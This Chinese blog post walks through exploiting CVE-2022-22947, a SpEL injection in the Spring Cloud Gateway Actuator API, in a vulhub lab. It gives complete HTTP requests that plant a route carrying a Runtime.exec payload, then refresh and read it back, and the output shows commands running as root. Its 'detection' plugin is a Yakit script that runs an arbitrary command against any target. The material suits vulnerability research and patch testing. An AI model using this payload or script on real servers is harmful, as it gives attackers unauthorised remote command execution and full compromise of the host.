Spring Cloud Gateway Actuator API SpEL代码注入

本文主要是介绍Spring Cloud Gateway Actuator API SpEL代码注入，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

CVE-2022-22947

Spring Cloud Gateway Actuator API SpEL代码注入

影响版本

• Spring Cloud Gateway 3.0.0以下，3.1.0，3.0.0~3.0.6

漏洞描述

​ Gateway是在Spring生态系统之上构建的API网关服务,基于Spring 5、Spring Boot 2和Project Reactor等技术。Gateway旨在提供-种简单而有效的方式来对API进行路由， 以及提供一些强大的过滤器功能， 例如: 熔断、限流、重试等。Spring Cloud Gateway的目标提供统-的路由方式且基于 Filter链的方式提供了网关基本的功能，例如:安全,监控/指标,和限流。

​ 该漏洞是发生在Spring Cloud Gateway应用程序的Actuator接口，其在启用、公开和不安全的情况下容易受到代码注入的攻击。攻击者可利用该漏洞通过恶意创建允许在远程主机上执行任意远程请求。

环境搭建

1. 进入到漏洞目录

   cd /vulhub/spring/CVE-2022-22947
   

2. 启动靶场

   docker-compose up -d
   

   

3. 访问网站
   

漏洞复现

参考文章：https://vulhub.org/#/environments/spring/CVE-2022-22947/

1. Yakit发送POST请求添加包含邪恶 SpEL路由，返回数据包显示路由创建成功
   
   包含执行命令的代码

   #{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}
   

   请求包代码如下：

   POST /actuator/gateway/routes/hacktest HTTP/1.1
   Host: 192.168.2.152:8080
   Accept-Encoding: gzip, deflate
   Accept: */*
   Accept-Language: en
   User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
   Connection: close
   Content-Type: application/json
   Content-Length: 329{"id": "hacktest","filters": [{"name": "AddResponseHeader","args": {"name": "Result","value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"}}],"uri": "http://example.com"
   }
   

2. 发送POST请求刷新网关
   

   请求包代码如下：

   POST /actuator/gateway/refresh HTTP/1.1
   Host: 192.168.2.152:8080
   Accept-Encoding: gzip, deflate
   Accept: */*
   Accept-Language: en
   User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
   Connection: close
   Content-Type: application/x-www-form-urlencoded
   Content-Length: 0
   

3. 发送GET请求检索结果
   

   请求代码如下：

   GET /actuator/gateway/routes/hacktest HTTP/1.1
   Host: 192.168.2.152:8080
   Accept-Encoding: gzip, deflate
   Accept: */*
   Accept-Language: en
   User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
   Connection: close
   Content-Type: application/x-www-form-urlencoded
   Content-Length: 0
   

   请求成功
   

   返回数据包中包含了命令执行后的代码

   uid=0(root) gid=0(root) groups=0(root)
   

4. 发送DELETE请求删除恶意路由
   

   代码如下：

   DELETE /actuator/gateway/routes/hacktest HTTP/1.1
   Host: 192.168.2.152:8080
   Accept-Encoding: gzip, deflate
   Accept: */*
   Accept-Language: en
   User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
   Connection: close
   

5. 刷新网关
   

   POST /actuator/gateway/refresh HTTP/1.1
   Host: 192.168.2.152:8080
   Accept-Encoding: gzip, deflate
   Accept: */*
   Accept-Language: en
   User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
   Connection: close
   Content-Type: application/x-www-form-urlencoded
   Content-Length: 0
   

漏洞检测

1. yakit新建插件（yakit—>插件管理—>插件仓库—>新插件）
   

   //获取目标
   target = cli.String("target")
   if target == "" {die("no target")
   } payload = cli.String("payload")
   if target == "" {die("no payload")
   } //发送第一个请求，创建恶意路由
   poc.HTTP(`
   POST /actuator/gateway/routes/hacktest HTTP/1.1
   Host: {{params(target)}}
   Accept-Encoding: gzip, deflate
   Accept: */*
   Accept-Language: en
   User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
   Connection: close
   Content-Type: application/json
   Content-Length: 329{"id": "hacktest","filters": [{"name": "AddResponseHeader","args": {"name": "Result","value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"{{params(payload)}}\"}).getInputStream()))}"}}],"uri": "http://example.com"
   }`, poc.params({"target":target,"payload":payload,}),
   )//发送第二个请求，刷新路由
   poc.HTTP(`POST /actuator/gateway/refresh HTTP/1.1
   Host: {{params(target)}}
   Accept-Encoding: gzip, deflate
   Accept: */*
   Accept-Language: en
   User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
   Connection: close
   Content-Type: application/x-www-form-urlencoded
   Content-Length: 0
   `, poc.params({"target":target,}),
   )//发送第三个请求，检索结果
   rsp, _, err := poc.HTTP(`
   GET /actuator/gateway/routes/hacktest HTTP/1.1
   Host: {{params(target)}}
   Accept-Encoding: gzip, deflate
   Accept: */*
   Accept-Language: en
   User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
   Connection: close
   Content-Type: application/x-www-form-urlencoded
   Content-Length: 0
   `, poc.params({"target":target,}),
   )
   die(err)//获取返回数据包中的结果，进行比对
   flag := "uid"
   header, body = str.SplitHTTPHeadersAndBodyFromPacket(rsp)
   if str.MatchAllOfSubString(body, flag) {println("found cve-2022-22947")
   } else {println("No found!")
   }
   

2. 检测漏洞，选择刚刚创建好的插件
   

3. 或者使用大佬已经写好的插件
   

。

这篇关于Spring Cloud Gateway Actuator API SpEL代码注入的文章就介绍到这儿，希望我们推荐的文章对编程师们有所帮助！

---